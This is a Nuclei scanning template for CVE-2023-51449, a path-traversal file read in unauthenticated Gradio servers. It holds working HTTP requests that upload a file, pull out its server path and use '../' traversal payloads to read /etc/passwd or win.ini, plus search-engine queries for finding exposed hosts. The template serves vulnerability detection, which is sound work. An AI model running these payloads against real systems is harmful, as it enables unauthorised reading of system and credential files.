id: CVE-2023-51449 info: name: Gradio Hugging Face - Local File Inclusion author: nvn1729 severity: high description: | Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33 reference: - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2 - https://nvd.nist.gov/vuln/detail/CVE-2023-51449 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-51449 cwe-id: CWE-22 epss-score: 0.00064 epss-percentile: 0.27836 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: verified: true max-request: 2 vendor: gradio_project product: gradio framework: python shodan-query: html:"__gradio_mode__" fofa-query: body="__gradio_mode__" tags: cve,cve2024,lfi,gradio,unauth,intrusive variables: str: '{{rand_base(8)}}' http: - raw: - | POST /upload HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311 -----------------------------250033711231076532771336998311 Content-Disposition: form-data; name="files";filename="okmijnuhbygv" Content-Type: application/octet-stream {{str}} -----------------------------250033711231076532771336998311-- - | GET /file={{download_path}}{{path}} HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body name: download_path internal: true group: 1 regex: - "\\[\"(.+)okmijnuhbygv\"\\]" payloads: path: - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini - ../../../../../../../../../../../../../../../etc/passwd stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - type: word part: content_type words: - "text/plain" - type: status status: - 200 # digest: 490a0046304402202afd5a76a8709b9e353a87ab56a8aef3d1afa2739156058f4a7cd46c851390400220687bf99017b86a6013b449d53d1c9b790e8e7b4ba7aec6fe2292b87a11d4527c:922c64590222798bb761d5b6d8e72950